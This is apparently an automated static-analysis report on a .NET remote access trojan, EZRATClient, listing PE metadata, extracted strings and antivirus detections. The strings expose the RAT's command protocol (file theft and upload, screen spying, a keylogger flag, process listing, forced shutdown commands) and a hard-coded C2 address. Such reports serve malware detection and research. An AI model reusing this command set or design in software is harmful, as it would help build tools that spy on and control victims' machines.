
PE Compile Time

2057-10-11 23:09:00

PDB Path

C:\Users\C\Desktop\EZRAT\EZRATClient\obj\Debug\EZRATClient.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000065fc 0x00006600 5.80402966342
.rsrc 0x0000a000 0x000005bc 0x00000600 4.16037270165
.reloc 0x0000c000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x0000a090 0x0000032c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0000a3cc 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
&*BSJB
v4.0.30319
#Strings
<>9__2_0
<ParserAndExecute>b__2_0
<>c__DisplayClass2_0
<>c__DisplayClass14_0
<>c__DisplayClass16_0
<>9__6_0
<ScreenSpyThread>b__6_0
<AddMessage>b__0
<SendMessage>b__0
<>9__2_1
<ParserAndExecute>b__2_1
<SendMessage>b__1
IEnumerable`1
Action`1
IEnumerator`1
List`1
Microsoft.Win32
UInt32
ToInt32
3162D5D5638BBF501FD80751C66291086C7C28542CB28AF9CB08EF20770ADDB2
<ParserAndExecute>b__2
Func`2
__StaticArrayInitTypeSize=13
<ParserAndExecute>b__3
<>9__2_4
<ParserAndExecute>b__2_4
get_UTF8
<Module>
<PrivateImplementationDetails>
System.Drawing.Drawing2D
get_SW_HIDE
System.IO
set_IV
get_SW_SHOW
System.Media
rawData
mscorlib
System.Collections.Generic
get_Id
StopScreenSpyThread
isFileDownload
get_ScreenShotSpeed
set_ScreenShotSpeed
_screenShotSpeed
get_InvokeRequired
CancelClosed
get_Connected
get_Texted
set_Texted
_texted
ReadToEnd
SendCommand
HandleCommand
ExecuteCommand
command
btnSend
NetworkInterface
set_AutoScaleMode
FileMode
set_SmoothingMode
CryptoStreamMode
set_InterpolationMode
resizeImage
FromImage
DrawImage
get_Message
AddMessage
SendMessage
NewMessage
message
LocalIPCache
LocalAVCache
Invoke
Enumerable
IDisposable
ToDouble
RuntimeFieldHandle
Rectangle
SendFile
ReceiveFile
recvFile
Console
set_BorderStyle
set_FormBorderStyle
set_FlatStyle
get_Name
set_Name
GetFileName
get_MachineName
GetMachineName
get_VictimName
set_VictimName
_victimName
GetUserName
get_ServerName
set_ServerName
_serverName
get_ProcessName
GetHostName
GetCpuName
GetGpuName
GetHostByName
get_AddressPreferredLifetime
WriteLine
get_NewLine
LocalMachine
get_NetworkInterfaceType
ValueType
ProtocolType
SocketType
System.Core
EZRATClient.Core
connectedBefore
ButtonBase
TextBoxBase
ReceiveResponse
response
Dispose
Create
Delegate
Delete
CompilerGeneratedAttribute
GuidAttribute
UnverifiableCodeAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
SecurityPermissionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ParserAndExecute
set_UseShellExecute
ReadByte
GetValue
Receive
EZRATClient.exe
get_Size
set_Size
writeSize
ReduceByteSize
get_DefaultCompressionSize
set_DefaultCompressionSize
_defaultCompressionSize
set_ClientSize
fup_size
imgToResize
get_Png
System.Threading
Encoding
System.Drawing.Imaging
isKlThreadRunning
System.Runtime.Versioning
FromBase64String
ToBase64String
ToString
GetString
Substring
add_FormClosing
disposing
System.Drawing
ShowDialog
rtbMsg
tbxMsg
ForEach
GetFolderPath
get_Width
get_Length
StartsWith
add_Click
System.Security.Principal
set_Cancel
System.ComponentModel
kernel32.dll
user32.dll
ContainerControl
WindowsControl
ReadStream
FileStream
NetworkStream
CryptoStream
MemoryStream
Program
get_Item
System
SymmetricAlgorithm
ICryptoTransform
applicationHidden
CopyFromScreen
AppDomain
get_CurrentDomain
set_ShowIcon
MessageBoxIcon
get_Version
GetWindowsVersion
_version
set_Location
fdl_location
fup_location
System.Net.NetworkInformation
UnicastIPAddressInformation
GatewayIPAddressInformation
SecurityAction
System.Reflection
ControlCollection
UnicastIPAddressInformationCollection
GatewayIPAddressInformationCollection
ManagementObjectCollection
SearchOption
IOException
SocketException
SetResolution
Button
SocketShutdown
FileInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
get_Ip
set_Ip
GetLanIp
onlyIp
Bitmap
get_Top
RequestLoop
System.Linq
set_ShowInTaskbar
get_Special_SeparatorChar
get_SeparatorChar
ScreenNumber
StreamReader
TextReader
StringBuilder
SpecialFolder
sender
encoder
Buffer
ManagementObjectSearcher
GetMainboardIdentifier
GetBiosIdentifier
MethodInvoker
FormClosingEventHandler
IContainer
ToUpper
CommandParser
ConnectToServer
IsLinuxServer
SoundPlayer
set_BackColor
set_UseVisualStyleBackColor
get_Special_Separator
_special_Separator
get_Separator
_separator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
CreateDecryptor
CreateEncryptor
CommandExecutor
Graphics
System.Diagnostics
GetCommands
GetBounds
GetAllNetworkInterfaces
System.Runtime.InteropServices
System.Runtime.CompilerServices
EZRATClient.Forms.Chat.resources
DebuggingModes
EnumerateDirectories
GetIPProperties
IPInterfaceProperties
EnumerateFiles
GetProcesses
get_UnicastAddresses
get_GatewayAddresses
Constantes
get_Attributes
FileAttributes
Rfc2898DeriveBytes
GetBytes
GetLogicalDrives
GetDrives
SocketFlags
FormClosingEventArgs
CancelEventArgs
<>4__this
SystemInfoDetails
EZRATClient.Utils
ScreenUtils
get_Controls
System.Windows.Forms
EZRATClient.Forms
getScreens
set_AutoScaleDimensions
System.Security.Permissions
System.Collections
MessageBoxButtons
get_Chars
RuntimeHelpers
Process
GetLocalIPAddress
get_Address
GetMacAddress
GetPhysicalAddress
System.Net.Sockets
components
get_OperationalStatus
Concat
ImageFormat
PixelFormat
ManagementBaseObject
ManagementObject
TConnect
_isDiconnect
get_isDisconnect
set_isDisconnect
System.Net
CreateDataPacket
_clientSocket
get_Left
get_Height
add_ProcessExit
CurrentDomain_ProcessExit
get_Default
FirstOrDefault
DialogResult
EZRATClient
TcpClient
client
System.Management
Environment
InitializeComponent
get_Current
GetCurrent
GetTotalRamAmount
TakeScreenShot
Decrypt
Encrypt
ThreadStart
Convert
get_Port
set_Port
ToList
get_AddressList
set_TopMost
set_ReadTimeout
SuspendLayout
ResumeLayout
PerformLayout
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
get_Text
set_Text
clearText
cipherText
GetConsoleWindow
set_CreateNoWindow
ShowWindow
nCmdShow
set_TabIndex
MessageBox
set_MinimizeBox
set_MaximizeBox
ToolBox
RichTextBox
get_DarkGray
get_LightGray
InitializeArray
ToArray
ToCharArray
set_Key
OpenSubKey
get_EncryptKey
_encryptKey
RegistryKey
System.Security.Cryptography
get_AddressFamily
set_ReadOnly
get_Spy
set_Spy
BlockCopy
set_WorkingDirectory
IPHostEntry
Registry
set_CompositingQuality
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
EZRATClient
Copyright
2019
$2a079f4e-4dcc-44db-8ca1-0cf2c6a5f41d
0.1.6.1
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
RSDS0x
C:\Users\C\Desktop\EZRAT\EZRATClient\obj\Debug\EZRATClient.pdb
_CorExeMain
mscoree.dll
Ivan Medvedev
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Disconnected
Cipher Text:
Connection Ended
Connection ended
Socket is not connected!
Send Command Failure
Connection attempt
Connected
Hacker
Victim
rtbMsg
tbxMsg
btnSend
10.109.9.128
0.1.6.1
POULPE212123542345235
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
SELECT * FROM Win32_BIOS
Manufacturer
Bios :
Unknown
SELECT * FROM Win32_BaseBoard
SerialNumber
Mainboard :
SELECT * FROM Win32_Processor
CPU :
Select * From Win32_ComputerSystem
TotalPhysicalMemory
RAM :
RAM : 0
SELECT * FROM Win32_DisplayConfiguration
Description
GPU :
{0}{1}-
MAC :
\Song.wav
Total data write : {0}
upfilestop;
Total data : {0}
getinfo-
infoback;
lsdrives
lsdrives;
lsfiles-
lsfiles;
chatdata;
dlfile;
upfile;
dtfile;
rmfile;
procview;
scrnshot;
control;
shutdown /l
shutdown /r /t 00
shutdown /s /f /p /t 00
sysinfo;
msgbox;
screenspy;
stopscreenspy;
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
EZRATClient
FileVersion
0.1.6.1
InternalName
EZRATClient.exe
LegalCopyright
Copyright
2019
LegalTrademarks
OriginalFilename
EZRATClient.exe
ProductName
EZRATClient
ProductVersion
0.1.6.1
Assembly Version
0.1.6.1
Antivirus Signature
Bkav W32.Common.70735AC2
Lionic Trojan.Win32.Agent.Y!c
tehtris Clean
MicroWorld-eScan IL:Trojan.MSILZilla.8536
CMC Clean
CAT-QuickHeal Clean
Skyhigh GenericRXVO-PD!3C7CB3033983
ALYac IL:Trojan.MSILZilla.8536
Cylance Unsafe
Zillya Trojan.Agent.Win32.2517135
Sangfor Backdoor.Msil.Agent.Vo5k
K7AntiVirus Trojan ( 00567e2b1 )
Alibaba Backdoor:MSIL/Generic.0dbfaa0c
K7GW Trojan ( 00567e2b1 )
Cybereason malicious.33983c
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/Agent.CTN
APEX Clean
Avast Win32:TrojanX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.Agent.gen
BitDefender IL:Trojan.MSILZilla.8536
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Agent.28672.DPO
Tencent Malware.Win32.Gencirc.140eafb9
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Heuristic.HEUR/AGEN.1371333
DrWeb Clean
VIPRE IL:Trojan.MSILZilla.8536
TrendMicro TROJ_GEN.R002C0PFB24
McAfeeD ti!14107CF25F0A
Trapmine Clean
FireEye Generic.mg.3c7cb3033983cabd
Emsisoft IL:Trojan.MSILZilla.8536 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Clean
Webroot Clean
Varist W32/ABRisk.EXJE-2421
Avira HEUR/AGEN.1371333
Antiy-AVL Trojan[Backdoor]/MSIL.Agent
Kingsoft MSIL.Backdoor.Agent.gen
Gridinsoft Trojan.Win32.Agent.sa
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D2158
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Backdoor.MSIL.Agent.gen
GData IL:Trojan.MSILZilla.8536
Google Detected
AhnLab-V3 Malware/Win32.RL_Generic.C4306758
Acronis Clean
BitDefenderTheta Clean
MAX malware (ai score=80)
VBA32 Clean
Malwarebytes Malware.AI.3974432689
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002C0PFB24
Rising Backdoor.ReverseRAT!1.E5F8 (CLASSIC)
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet MSIL/Agent.CTN!tr
AVG Win32:TrojanX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_90% (W)
alibabacloud Backdoor:MSIL/MSILZilla.Gen
No IRMA results available.